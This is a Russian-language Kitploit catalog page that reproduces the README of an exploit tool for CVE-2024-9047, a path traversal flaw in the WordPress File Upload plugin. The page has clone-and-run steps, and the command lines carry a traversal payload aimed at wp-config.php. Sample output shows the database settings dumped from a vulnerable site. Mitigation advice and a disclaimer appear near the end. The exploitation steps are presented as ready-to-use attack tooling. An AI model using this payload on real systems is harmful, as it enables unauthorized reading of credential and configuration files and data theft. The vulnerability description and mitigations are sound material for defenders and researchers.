Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9047-Exploit — Эксплойт для плагина загрузки файлов WordPress - все версии до 4.24.11 уязвимы. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-9047-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Эксплойт для плагина загрузки файлов WordPress - все версии до 4.24.11 уязвимы.

Репозиторий
411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-9047: Эксплойт для плагина WordPress File Upload

Описание

Плагин WordPress File Upload для WordPress уязвим к Path Traversal во всех версиях до 4.24.11 включительно через файл wfu_file_downloader.php. Эта уязвимость позволяет неаутентифицированным злоумышленникам читать или удалять файлы за пределами целевого каталога. Успешная эксплуатация требует, чтобы целевая установка WordPress работала на PHP 7.4 или более ранней версии.

Воздействие

  • Серьезность: Критическая
  • Оценка CVSS: 9.8 (Критическая)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет

Эксплуатация

Злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированный запрос к уязвимой конечной точке wfu_file_downloader.php, и манипулируя параметром пути к файлу для получения несанкционированного доступа к конфиденциальным файлам на сервере.


Детали эксплойта

Требования

  • Целевая установка WordPress должна иметь установленный уязвимый плагин (4.24.11 или более ранней версии).
  • Сервер должен работать на PHP версии 7.4 или более ранней.

Шаги для эксплуатации

  1. Клонируйте этот репозиторий:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Установите зависимости Python (при необходимости):

    root@kitploit:~
    pip install requests
    
  3. Запустите скрипт для проверки версии плагина и эксплуатации уязвимости:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Пример использования

Для эксплуатации уязвимой конфигурации по умолчанию и чтения конфигурационного файла WordPress:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Результат

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Меры по смягчению

Чтобы защитить ваш сайт WordPress:

  1. Обновите плагин WordPress File Upload до последней версии.
  2. Убедитесь, что версия PHP обновлена до поддерживаемой (выше 7.4).
  3. Ограничьте права доступа к файлам, чтобы предотвратить несанкционированный доступ к конфиденциальным файлам.
  4. Используйте брандмауэр веб-приложений (WAF) для блокировки вредоносных запросов.

Отказ от ответственности

Этот код предназначен только для образовательных и исследовательских целей. Несанкционированное использование этого скрипта на системах, которыми вы не владеете или не имеете явного разрешения на тестирование, является незаконным и неэтичным. Авторы не несут ответственности за любое неправомерное использование этого кода.

Скачать инструмент